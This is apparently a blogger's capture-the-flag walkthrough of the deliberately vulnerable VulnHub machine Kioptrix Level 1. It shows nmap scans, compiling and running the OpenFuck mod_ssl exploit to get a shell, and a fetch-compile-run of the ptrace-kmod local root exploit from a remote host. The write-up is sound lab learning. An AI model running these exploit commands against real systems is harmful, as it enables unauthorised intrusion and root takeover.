Details
This machine is https://www.vulnhub.com/entry/kioptrix-level-1-1,22/
NOTE: For this machine I had to make some changes to the default settings, disabling audio and changing the network card to PCnet-PCII
Recon Phase
To start I carried out a discovery scan with nmap to find the target
root@kali:~# nmap -sn 192.168.56.0/24
Nmap scan report for 192.168.56.1
Host is up (0.00025s latency).
MAC Address: 0A:00:27:00:00:11 (Unknown)
Nmap scan report for 192.168.56.100
Host is up (0.0011s latency).
MAC Address: 08:00:27:17:EC:78 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.102
Host is up (0.0011s latency).
MAC Address: 08:00:27:B2:55:C0 (Oracle VirtualBox virtual NIC)
Nmap scan report for 192.168.56.101
Host is up.
Nmap done: 256 IP addresses (4 hosts up) scanned in 2.13 seconds
With my target running on 192.168.56.102 I used a service discovery scan to look for access points
root@kali:~# nmap -sV 192.168.56.102
Nmap scan report for 192.168.56.102
Host is up (0.00081s latency).
Not shown: 994 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 2.9p2 (protocol 1.99)
80/tcp open http Apache httpd 1.3.20 ((Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b)
111/tcp open rpcbind 2 (RPC #100000)
139/tcp open netbios-ssn Samba smbd (workgroup: MYGROUP)
443/tcp open ssl/https Apache/1.3.20 (Unix) (Red-Hat/Linux) mod_ssl/2.8.4 OpenSSL/0.9.6b
32768/tcp open status 1 (RPC #100024)
MAC Address: 08:00:27:B2:55:C0 (Oracle VirtualBox virtual NIC)
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 16.97 seconds
Service Exploitation
By checking exploit-db I came across a potential exploit against the apache webserver, https://www.exploit-db.com/exploits/764/, I had to follow some extra instructions to make it compile on my kali 18.01 install http://paulsec.github.io/blog/2014/04/14/updating-openfuck-exploit/. Although I found the openSSL headers installed in these instructions didn't work and I had to change to older ones
root@kali:~# apt install libssl1.0-dev
Which then allowed the exploit to compile
root@kali:~# gcc -o OpenFuck OpenFuck.c -lcrypto
With the exploit compile I looked at the instructions and found some potential "box names" to use
0x69 - RedHat Linux 7.1-Update (1.3.27-1.7.1)
0x6a - RedHat Linux 7.2 (apache-1.3.20-16)1
0x6b - RedHat Linux 7.2 (apache-1.3.20-16)2
0x6c - RedHat Linux 7.2-Update (apache-1.3.22-6)
I started by trying 0x6a
root@kali:~# ./OpenFuck 0x6a 192.168.56.102
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
Good Bye!
This didn't work, so I tried 0x6b
root@kali:~# ./OpenFuck 0x6b 192.168.56.102
*******************************************************************
* OpenFuck v3.0.32-root priv8 by SPABAM based on openssl-too-open *
*******************************************************************
* by SPABAM with code of Spabam - LSD-pl - SolarEclipse - CORE *
* #hackarena irc.brasnet.org *
* TNX Xanthic USG #SilverLords #BloodBR #isotk #highsecure #uname *
* #ION #delirium #nitr0x #coder #root #endiabrad0s #NHC #TechTeam *
* #pinchadoresweb HiTechHate DigitalWrapperz P()W GAT ButtP!rateZ *
*******************************************************************
Establishing SSL connection
cipher: 0x4043808c ciphers: 0x80f8050
Ready to send shellcode
Spawning shell...
bash: no job control in this shell
bash-2.05$
exploits/ptrace-kmod.c; gcc -o p ptrace-kmod.c; rm ptrace-kmod.c; ./p; net/0304-
--17:44:37-- http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to dl.packetstormsecurity.net:80...
dl.packetstormsecurity.net: Host not found.
gcc: ptrace-kmod.c: No such file or directory
gcc: No input files
rm: cannot remove `ptrace-kmod.c': No such file or directory
bash: ./p: No such file or directory
bash-2.05$
The error downloading a file was expected as the machine was on and isolated network so it could not access the internet to get the file.
Priv Esc
Instead I downloaded it onto my kali machine from http://dl.packetstormsecurity.net/0304-exploits/ptrace-kmod.c. Then using apach2 on my kali machine, and wget on the target, I transferred it to the target
root@kali:~# cp ptrace-kmod.c /var/www/html/ptrace-kmod.c
root@kali:~# apach2ctl start
bash-2.05$ cd /tmp
bash-2.05$ wget 192.168.56.101/ptrace-kmod.c
--18:17:47-- http://192.168.56.101/ptrace-kmod.c
=> `ptrace-kmod.c'
Connecting to 192.168.56.101:80... connected!
HTTP request sent, awaiting response... 200 OK
Length: 3,921 [text/x-csrc]
0K ... 100% @ 3.74 MB/s
18:17:47 (3.74 MB/s) - `ptrace-kmod.c' saved [3921/3921]
With the exploit transferred, I compiled and ran it
bash-2.05$ gcc -o p ptrace-kmod.c
bash-2.05$ ./p
[+] Attached to 1001
[+] Waiting for signal
[+] Signal caught
[+] Shellcode placed at 0x4001189d
[+] Now wait for suid shell...
#
And that spawned a new shell
# whoami
root
Now I had the machine rooted, but finding the flag took a while, eventually I found it in a mail
# cat /var/mail/root
From root Sat Sep 26 11:42:10 2009
Return-Path:
Received: (from root@localhost)
by kioptix.level1 (8.11.6/8.11.6) id n8QFgAZ01831
for root@kioptix.level1; Sat, 26 Sep 2009 11:42:10 -0400
Date: Sat, 26 Sep 2009 11:42:10 -0400
From: root
Message-Id: <200909261542.n8QFgAZ01831@kioptix.level1>
To: root@kioptix.level1
Subject: About Level 2
Status: O
If you are reading this, you got root. Congratulations.
Level 2 won't be as easy...
And with that I was ready to move onto the next machine
